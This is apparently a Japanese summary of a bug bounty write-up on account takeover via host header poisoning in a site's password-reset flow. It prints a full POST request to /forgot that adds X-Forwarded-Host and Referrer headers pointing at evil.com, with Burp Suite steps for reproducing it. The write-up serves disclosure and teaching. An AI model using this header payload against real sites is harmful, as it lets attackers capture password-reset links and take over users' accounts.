Hello there, ('ω')ノ
ホストヘッダポイズニングによるアカウント乗っ取りを。
脆弱性:
ホストヘッダインジェクション
アカウントの乗っ取り
パスワード リセットの脆弱性
記事:
https://sechunter.medium.com/ato-via-host-header-poisoning-dc5c29d2fd0d
今回は、ホスト ヘッダ ポイズニングによるアカウント乗っ取りに関するもので。
Redacted.com はホスト ヘッダ インジェクションに対して脆弱であり。
リモートの攻撃者がこれを悪用して redacted.com のアカウントを。
乗っ取ることができて。
攻撃シナリオ:
攻撃者として、POST リクエストを変更することに。
最初に Host ヘッダの値を Evil.com に変更しましたが、何も起こらず。
次に X-Forwarded-Host ヘッダに Evil.com の値を追加しましたが、再び何も起こらず。
今回は Referrer ヘッダの値も変更し、X-Forwarded-Host ヘッダの値と同じ値を。
設定したところ、うまくいって。
リクエストは次のようになり。
POST /forgot HTTP/1.1
Host: redacted.com
X-Forwarded-Host: evil.com
Referrer: https://evil.com
username=<username>&_csrf_token=5905477eb5efbc742cb051b922df433a775ae92e
リクエストを送信した後、evil.com が次のようなホストのメールを受け取って。
再現手順:
1.「 https://redacted.com/forgot」に移動して。
2.次にユーザ名を入力し、Burp Suite を使用して。
そのリクエストをインターセプトして。
3.次の 2 つのヘッダを POST リクエストに追加して。
X-Forwarded-Host: evil.com
Referrer: https://evil.com
4. そのリクエストを転送し、ユーザ名にリンクされているメールを確認して。
Best regards, (^^ゞ